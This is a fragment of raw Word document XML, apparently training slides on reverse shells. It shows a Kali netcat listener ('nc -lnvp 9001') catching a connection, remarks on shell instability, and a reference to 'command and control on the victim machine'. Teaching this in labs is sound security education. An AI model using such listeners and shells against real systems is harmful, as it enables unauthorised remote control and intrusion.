        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>If you use the -v verbose flag on your listener, you will see the connection.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="16568" w:type="dxa"/>
        <w:tblInd w:w="323" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="70" w:type="dxa"/>
          <w:left w:w="128" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="30" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="16568"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="3C0354FB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="3611"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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D0686CA" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="3818"/>
              </w:tabs>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:t>root@kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:tab/>
              <w:t>nc -Invp 9001</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E6DE100" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="30"/>
              <w:ind w:left="4185"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E634CBD" wp14:editId="7283F335">
                  <wp:extent cx="2581275" cy="28575"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="257547" name="Picture 2575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547" name="Picture 257547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5DB350" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="46"/>
              </w:rPr>
              <w:t xml:space="preserve">Ncat: Version </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B161E88" wp14:editId="2A9E1F00">
                  <wp:extent cx="114300" cy="38100"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="257324" name="Picture 2573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324" name="Picture 257324"/>
                          <pic:cNvPicPr/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6"/>
              </w:rPr>
              <w:t>7.70 ( https: //nmap.org/ncat )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DB4D6B6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="46"/>
              <w:ind w:left="3510"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F180371" wp14:editId="2748C19F">
                  <wp:extent cx="3200400" cy="9525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="340841" name="Picture 3408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841" name="Picture 340841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9DC501" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33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9680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2D38B3C0" wp14:editId="73548F0F">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>2081213</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>189859</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="657225" cy="57150"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapSquare wrapText="bothSides"/>
                      <wp:docPr id="341154" name="Group 3411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7225" cy="57150"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="657225" cy="571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7290" name="Picture 257290"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId19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66725" y="0"/>
                                  <a:ext cx="190500" cy="38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7345" name="Picture 257345"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId19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600" cy="571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41154" style="width:51.75pt;height:4.5pt;position:absolute;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:163.875pt;mso-position-vertical-relative:text;margin-top:14.9495pt;" coordsize="6572,571">
                      <v:shape id="Picture 257290" style="position:absolute;width:1905;height:381;left:4667;top:0;" filled="f">
                        <v:imagedata r:id="rId195"/>
                      </v:shape>
                      <v:shape id="Picture 257345" style="position:absolute;width:2286;height:571;left:0;top:0;" filled="f">
                        <v:imagedata r:id="rId196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sz w:val="50"/>
              </w:rPr>
              <w:t xml:space="preserve">Ncat: Listening on </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="50"/>
              </w:rPr>
              <w:t>: : : 9001</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689B9CBD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="50"/>
              </w:rPr>
              <w:t>Ncat: Listening on e. e. e. e: 9001</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34D8F5A6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:t>Ncat: connection from 192.168.229.10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0254A5DE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="45"/>
              <w:ind w:left="1155"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E012924" wp14:editId="5D93F2C3">
                  <wp:extent cx="3867150" cy="76200"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="340845" name="Picture 3408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845" name="Picture 340845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6BF0D9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:t xml:space="preserve">Ncat: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FD514E2" wp14:editId="7C8EE71B">
                  <wp:extent cx="9686925" cy="819150"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="340847" name="Picture 3408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847" name="Picture 340847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692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4"/>
              </w:rPr>
              <w:t>connection from 192.168.229.105: 53080.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66DFE8BB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>There won't be a "visible" prompt, but you do have a shell!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F02A65" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15540" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1145022E" wp14:editId="1F714C7F">
            <wp:extent cx="1409700" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="257685" name="Picture 2576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85" name="Picture 25768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4413" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>Now, commands can be entered in an interactive way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641B6F82" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="300" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="589056F0" wp14:editId="346414DF">
            <wp:extent cx="11087100" cy="4819650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340849" name="Picture 340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49" name="Picture 340849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A991" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="112"/>
        <w:ind w:left="418" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Some drawbacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E22E342" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="192" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t xml:space="preserve">Our reverse shell was set to run / bin/ sh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:tab/>
        <w:t>why not use / bin/ bash?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B755509" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>This shell is not very "stable:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4C100F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Control characters (like AC to stop a program) could kill the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54110ED4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>Moving the cursor with left-and-right arrows produces escape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D72ACC4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="1"/>
        <w:ind w:left="1644"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="42"/>
        </w:rPr>
        <w:t>sequences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235A9533" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>No Tab auto-completion functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651A8FA1" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="454" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>No visible prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470505FB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15612" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E818720" wp14:editId="4A29C7D7">
            <wp:extent cx="1363980" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="267199" name="Picture 267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99" name="Picture 26719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36A4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="400" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="74"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A quick magic trick helps fix these issues:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A13FDDB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="285" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FE46EA1" wp14:editId="3974E311">
            <wp:extent cx="11096625" cy="4943475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340851" name="Picture 340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51" name="Picture 340851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110966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90F3" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Command and control on the victim machine!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500BA4AD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="75" w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>You have flexible remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B957FD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="3"/>
        <w:ind w:right="75" w:hanging="555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5437CF14" wp14:editId="7C100C2D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>10058400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>2581275</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2133600" cy="2695575"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="339987" name="Group 339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600" cy="2695575"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2133600" cy="2695575"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="340853" name="Picture 340853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2609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0584" name="Rectangle 280584"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1943100" y="2571750"/>
                            <a:ext cx="253365" cy="1646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872FF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:t>Oct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37CF14" id="Group 339987" o:spid="_x0000_s1069" style="position:absolute;left:0;text-align:left;margin-left:11in;margin-top:203.25pt;width:168pt;height:212.25pt;z-index:251720704;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="21336,269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Qdj6Q1gIAAMwGAAAOAAAAZHJzL2Uyb0RvYy54bWycVdtu3CAQfa/U&#10;f0C8J7bXe7WyG1VNE0WqmlXTfgCLsY1qAwL21q/vDL5skm2VNA/rHQaYOZwzA1fXh6YmO2Gd1GpJ&#10;k8uYEqG4zqUql/Tnj9uLOSXOM5WzWiuxpEfh6PXq44ervcnESFe6zoUlEES5bG+WtPLeZFHkeCUa&#10;5i61EQomC20b5mFoyyi3bA/RmzoaxfE02mubG6u5cA68N+0kXYX4RSG4fygKJzyplxSw+fC14bvB&#10;b7S6Yllpmakk72Cwd6BomFSQdAh1wzwjWyvPQjWSW+104S+5biJdFJKLcAY4TRK/OM2d1VsTzlJm&#10;+9IMNAG1L3h6d1j+bbe2ROZLmqaLxXxGiWIN6BRSk84HJO1NmcHaO2sezdp2jrId4bkPhW3wH05E&#10;DoHe40CvOHjCwTlK0nQagwoc5kbTxWQym7QC8ApUOtvHqy+v7Iz6xBHiG+AYyTP4dXyBdcbX63UF&#10;u/zWCtoFad4Uo2H219ZcgLSGebmRtfTHUKYgIoJSu7Xka9sOnlA/jueTtKcelmBmkrZe4Bq34mrc&#10;C8MIx89CbWppbmVdowJod6Chzl/UyV/O3dbgjebbRijfNpUVNeDXylXSOEpsJpqNgBqx93nSKua8&#10;FZ5XmLCAxN+h0RAZy4aJgPIEDDE7KJ23FkuySFOsj65Y4sV8Erp1kJxlxjp/J3RD0ABwgAF4Zhnb&#10;fXUdmn5JR1oLICADPFjVcOu4ni4YnRH2X431WDEjAAKGPak7mseT+bhXF5liqqwF6fyhl8L6obPc&#10;v5hKFuM0wQ7CBprMklnLCcuGFptAi3WkJdPxFBq6laXvz56QN3HGslohoUpjcbWB0APd1kNEyx82&#10;h3CFjBaYDV0bnR/hXqm0/f0Ar0NR6/2S6s6i+GCAYDhLSX2vgHa8m3vD9samN6yvP+twg7dwPm29&#10;LmTQ+JStwwV6BitcmWA9u5OfjsOq0yO0+gMAAP//AwBQSwMECgAAAAAAAAAhAP5Z+pY6KwAAOisA&#10;ABQAAABkcnMvbWVkaWEvaW1hZ2UxLmpwZ//Y/+AAEEpGSUYAAQEBAGAAYAAA/9sAQwADAgIDAgID&#10;AwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU&#10;/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU&#10;FBQUFBQUFBQUFBQU/8AAEQgBEgDL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&#10;IfAmjzm3ighfCX